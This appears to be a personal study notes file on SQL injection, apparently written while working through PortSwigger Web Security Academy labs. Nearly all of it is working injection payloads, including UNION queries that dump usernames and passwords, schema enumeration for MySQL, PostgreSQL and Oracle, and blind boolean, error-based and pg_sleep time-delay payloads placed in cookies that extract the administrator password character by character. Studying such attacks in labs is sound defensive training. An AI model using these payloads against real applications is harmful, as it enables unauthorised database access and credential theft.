wnzbmp5qwt2uw58k5s57

# SQL Injection Attacks

https://portswigger.net/web-security/sql-injection/cheat-sheet

## Retrieve hidden data

https://insecure-website.com/products?category=Gifts

```sql
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```

https://insecure-website.com/products?category=Gifts'--
```sql
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
```

https://insecure-website.com/products?category=Gifts'+OR+1=1--
```sql
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
```

```sql 
SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
SELECT * FROM users WHERE username = 'administrator'--' AND password = ''
```

## Union

```sql 
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
```

- Find number of return columns

https://ace61fdf1ee05062c08fe22c00530090.web-security-academy.net/filter?category=Pets%27+union+select+null,null,null--

```sql
SELECT col1, col2, col3 from sometable UNION SELECT NULL,NULL,NULL-- WHERE col3='Pets'
```

- Find string column
https://ac571f9e1e5f1665c0794a5e00550021.web-security-academy.net/filter?category=Pets%27+union+select+null,%27c6hjaI%27,null--
```sql
SELECT col1, col2, col3 from sometable UNION SELECT NULL,'c6hjaI',NULL-- WHERE col3='Pets'
```

- Retrieve data
https://acd51fdb1e3e12abc05224f200240031.web-security-academy.net/filter?category=Pets%27+union+select+null,username||%27~%27||password+from+users--
```sql

```

## Examine Database

Database type | Query   |
--------------|----------|
Microsoft, MySQL |	SELECT @@version|
Oracle |	SELECT * FROM v$version|
PostgreSQL	|SELECT version()|

https://ac061f931ee8b255c01e02f400010032.web-security-academy.net/filter?category=Accessories%27+union+select+BANNER,+null+from+v$version--

Burp repeater: 
```json
GET /filter?category=Gifts'+union+select+@@version,+@@version# HTTP/1.1
```

- List all tables and get user info from user table

https://acbb1f5b1e067069c00f99370058000c.web-security-academy.net/filter?category=Gifts%27union+SELECT+table_name,table_type+FROM+information_schema.tables--
```json
GET /filter?category=Gifts'union+SELECT+table_name,table_type+FROM+information_schema.tables-- 
GET /filter?category=Gifts'union+SELECT+column_name,data_type+FROM+information_schema.columns+where+table_name='users_jhqafn'-- HTTP/1.1
GET /filter?category=Gifts'union+SELECT+username_yrxcrk,password_lojaku+FROM+users_jhqafn-- HTTP/1.1        
```

Oracle
```json
GET /filter?category=Gifts'union+select+table_name,owner+from+all_tables-- 
GET /filter?category=Gifts'union+select+column_name,data_type+from+ALL_TAB_COLUMNS+where+table_name='USERS_YONNXH'-- HTTP/1.1
GET /filter?category=Gifts'union+SELECT+USERNAME_TRCXQE,PASSWORD_VRDFLD+FROM+USERS_YONNXH-- HTTP/1.1
```
https://ac711f8b1e104219c048076b002f0039.web-security-academy.net/filter?category=Gifts%27union+SELECT+USERNAME_TRCXQE,PASSWORD_VRDFLD+FROM+USERS_YONNXH--


## Blind SQL Injection

```sql 
Cookie: TrackingId=yhJZam4tyI9SbzYO' and '1'='1; session=GOYGP1VPESLlATKcri4AE1pvOoEFvrIw

Cookie: TrackingId=yhJZam4tyI9SbzYO' and (select 'a' from users limit 1)='a; session=GOYGP1VPESLlATKcri4AE1pvOoEFvrIw

Cookie: TrackingId=yhJZam4tyI9SbzYO' and (select substring(password,20,1) from users where username='administrator')='§a§; session=GOYGP1VPESLlATKcri4AE1pvOoEFvrIw
```

```sql
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
-- i.e ' -> ' and '1'='1
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' and '1'='1'
```

- Inject error into application through SQL query

```sql 
Cookie: TrackingId=HoOQORUSNoo3HLqS'||(select case when substr(password,§1§,1)='§a§' then TO_CHAR(1/0) else '' end from users where username='administrator')||'; session=tQROsx6jXaqtPbMXVmGZ5FXZQIdO99n2 
```

- Introducing delay
```json
Cookie: TrackingId=AgDvIjgEv6yYnSQ1'||pg_sleep(10)--; session=PwF6dqptx9ryn4sjJHjjQR0BSIX13zBz

Cookie: TrackingId=4ebCEWnlyYzShdzN'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--; session=yElQ9xpP9aX2b7Wlsjk959YC5OR2odOX
        
Cookie: TrackingId=fveFE9JuQWcDM0GO' and select case when (username='administrator' and substring(password,1,1)='a') then pg_sleep(10) else pg_sleep(0) end from users; session=fYrjf9WqYle5LJT35WUfjS5asvRSJS00

Cookie: TrackingId=4ebCEWnlyYzShdzN'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,§1§,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--; session=yElQ9xpP9aX2b7Wlsjk959YC5OR2odOX

```
